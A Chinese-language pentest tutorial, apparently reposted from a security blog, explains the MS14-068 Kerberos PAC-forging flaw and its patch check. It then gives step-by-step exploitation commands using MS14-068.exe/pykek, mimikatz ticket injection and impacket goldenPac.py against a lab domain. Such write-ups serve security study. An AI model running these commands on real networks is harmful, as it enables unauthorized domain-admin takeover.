MS14-068
MS14-068
MS14068
是一个能够使普通用户提权到域控权限的权限提升漏洞。攻击者可以通过构造特定的请求包来达到提升权限的目的。
这个漏洞中主要的问题是存在于KDC
会根据客户端指定PAC
中数字签名的加密算法,以及PAC
的加密算法,来校验PAC
的合法性。这使得攻击者可通过伪造PAC
,修改PAC
中的SID
,导致KDC
判断攻击者为高权限用户,从而导致权限提升漏洞的产生。
漏洞补丁地址: https://technet.microsoft.com/zh-cn/library/security/MS14-068
利用方式
MS14-068
对应的补丁为KB3011780
,可在域控上通过systeminfo
查看是否安装此补丁。
1 |
systeminfo|find "3011780" |
keoko
1 |
klist purge清除票据 |
Pykek
py:https://github.com/mubix/pykek
exe:https://github.com/ianxtianxt/MS14-068
参数说明:
-u 域账号@域名称
-p 为当前用户的密码
-s 为当前用户的SID值,可以通过whoami/all来获取用户的SID值
-d 为当前域的域控
–rc4 为当前用户的Hash
- 通过dir来访问域控的共享文件夹,提示拒绝访问。
1
dir \\OWA2013.rootkit.org\c$
- 生成票据
1
MS14-068.exe -u [email protected] -p Admin12345 -s S-1-5-21-3759881954-2993291187-3577547808-1613 -d OWA2013.rootkit.org
- 脚本执行成功会在当前目录下生成一个
ccache
文件,票据导入之前cmd下使用命令klist purge
,或者在mimikatz
中使用kerberos::purge
删除当前缓存的kerberos
票据。
1
klist purge
- 使用mimikatz导入生成的
ccache
文件
1
mimikatz "kerberos::ptc [email protected]" exit
再次dir访问域控共享就可以成功访问。
goldenPac
impacket工具包里面的goldenPac.py,这个工具是结合ms14-068
加psexec
的产物,利用起来十分顺手。
1 |
python goldenPac.py -dc-ip 192.168.3.144 -target-ip 192.168.3.144 rootkit.org/sqladmin:[email protected] |
参考
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2014/ms14-068
https://daiker.gitbook.io/windows-protocol/kerberos/3
https://cloud.tencent.com/developer/article/1760132
https://www.cnblogs.com/backlion/p/6820744.html
- source:se7ensec.cn
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论